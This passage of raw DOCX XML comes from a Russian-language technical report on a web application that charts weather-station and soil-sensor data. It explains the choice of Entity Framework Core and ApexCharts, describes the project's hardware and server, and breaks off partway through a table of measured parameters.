      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">код транслируется в </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">команды и наоборот, что обеспечивает защиту от </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">инъекций, и в случае когда базу данных будет необходимо изменить на другую, например перейти с </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">не нужно будет переписывать весь код, а лишь поменять параметры подключения в настроечном файле </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t xml:space="preserve"> Аналогом </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t xml:space="preserve">является технология </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t xml:space="preserve">которая также является очень распространённой и удобной в работе с базой данных, но </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t xml:space="preserve">может работать только с БД </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t xml:space="preserve">а с </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t xml:space="preserve"> она работать не будет, поэтому в разработке проекта было решено использовать </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862" w:rsidRPr="00BC7862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidR="00BC7862">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249E155" w14:textId="5F6EBA8C" w:rsidR="000A1EC6" w:rsidRDefault="000A1EC6" w:rsidP="005924E5">
      <w:r>
        <w:t xml:space="preserve">Также помимо выбора технологий для серверной части, необходимо определить технологии, с помощью которых будут реализованы элементы пользовательского интерфейса. Как упоминалось выше, основной частью графического пользовательского интерфейса являются графики функций, отображающие данные метеостанции и датчиков-влагомеров (для отображения данных в табличном виде достаточно технологий, предоставляемых языком разметки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FB510" w14:textId="443C6888" w:rsidR="00E258B2" w:rsidRDefault="000A1EC6" w:rsidP="00673530">
      <w:r>
        <w:t xml:space="preserve">Графики функций было решено реализовывать с помощью сторонних </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-библиотек, так как такие библиотеки предоставляют «из коробки» возможности интерактивного взаимодействия с ними (увеличение размера, анимационные переходы при перерисовке графика, генерация системы координат на графике). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-библиотек для графиков существует </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">достаточно много, и они по существу почти неотличимы друг от друга. Выбор разработчика остановился на </w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t xml:space="preserve">библиотеке под названием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C1A5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApexCharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA5706" w:rsidRPr="00BD5112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00AA5706" w:rsidRPr="00BD5112">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00BD5112">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4" w:rsidRPr="001F2AD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:t xml:space="preserve">Одним из других рассматриваемых вариантов была рассмотрена библиотека </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rechart</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4" w:rsidRPr="001F2AD4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:t xml:space="preserve">но для того, чтобы пользоваться этой библиотекой необходимо дополнительные знания технологии </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4" w:rsidRPr="001F2AD4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F2AD4">
        <w:t xml:space="preserve">, поэтому отображение графиков было решено реализовать с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApexCharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F2AD4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t xml:space="preserve"> Отличительной особенностью данной библиотеки стала более подробная и наглядная документация по сравнению с конкурентами, и наличие поддержки от разработчиков </w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CORE</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA5CD6" w14:textId="77777777" w:rsidR="00E258B2" w:rsidRDefault="00E258B2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="122622D6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002F75C4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc161568213"/>
      <w:bookmarkStart w:id="36" w:name="_Toc162709239"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4 Программирование веб-сервера</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3DB0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>графического пользовательского интерфейса и базы данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13346C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007B3DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc161568214"/>
      <w:bookmarkStart w:id="38" w:name="_Toc162709240"/>
      <w:r w:rsidRPr="007B3DB0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Аппаратное обеспечение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>проекта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="67CEF46A" w14:textId="33F38D18" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:r>
        <w:t>Основной задачей текущего исследования является визуализация данных, полученных от автоматической цифровой метеостанции и почвенных датчиков-влагомеров. Данные приборы разработаны в лаборатории «</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t>Сектор средств инструментального контроля</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00BD5112">
        <w:t>[18]</w:t>
      </w:r>
      <w:r>
        <w:t>. Автоматическая цифровая метеостанция и сенсорные узлы (почвенные датчики) представлены:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098376E7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>аппаратным оборудованием;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13754114" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>локальным хранилищем данных;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E68D8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>веб-приложением.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18F260" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D623CA">
      <w:r>
        <w:t xml:space="preserve">Аппаратное оборудование включает в себя базовую станцию и набор датчиков (в составе сенсорных узлов), в том числе удалённых, подключённых к базовой станции с использованием протоколов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UART</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Базовая станция управляется микрокомпьютером, имеющем средства хранения в виде флэш-накопителей, а также связи с сетью интернет посредством 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>модема.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17006E" w14:textId="7200121B" w:rsidR="0093378B" w:rsidRPr="003A3636" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:r>
        <w:t xml:space="preserve">Локальное хранилище данных располагается в базовой станции. Выполнено на СУБД </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003449E6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Копия данных и сам веб-сервер размещены на сервере Агрофизического Научно-Исследовательского Института. Аппаратная часть веб-сервер представляет собой персональный компьютер со следующими техническими характеристиками: ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intel</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A3636">
        <w:t xml:space="preserve">3 1,20 </w:t>
      </w:r>
      <w:r>
        <w:t>ГГц, 4 ядра</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Мб кэш </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3636">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; 4 Гб ОЗУ; 2ТБ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HDD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Поскольку приложение веб-сервера является </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>кросс-платформенным</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00374416">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при необходимости его можно перенести на другие платформы, в том числе и на российские операционные системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C782E3D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:r>
        <w:t>Параметры работы автоматической цифровой метеостанции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992AF6F" w14:textId="5E0D9551" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C73BD1">
      <w:r>
        <w:t>Метеостанция питается от постоянной сети и отправляет на веб-сервер по сети интернет показатели датчиков каждые 30 минут</w:t>
      </w:r>
      <w:r w:rsidR="003629E8">
        <w:t xml:space="preserve"> (включая показатели </w:t>
      </w:r>
      <w:r w:rsidR="003629E8">
        <w:lastRenderedPageBreak/>
        <w:t>датчика-влагомера по пяти слоям почвы)</w:t>
      </w:r>
      <w:r>
        <w:t>. В следующей таблице представлены данные, измеряемые метеостанцией и сенсорными узлами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60DD8F" w14:textId="13E0D030" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="003449E6">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00823137">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Данные о агроэкосистеме измеряемые метеостанцией</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="4103"/>
        <w:gridCol w:w="2208"/>
      </w:tblGrid>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="0DFEA7B7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="339"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E20A58B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Измеряемый параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="357BA33B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Пример значений</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6331F130" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ед. измерения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="26435F8C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D74D2D2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Температура поверхности земли</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05C8BD1A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="010B36D6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
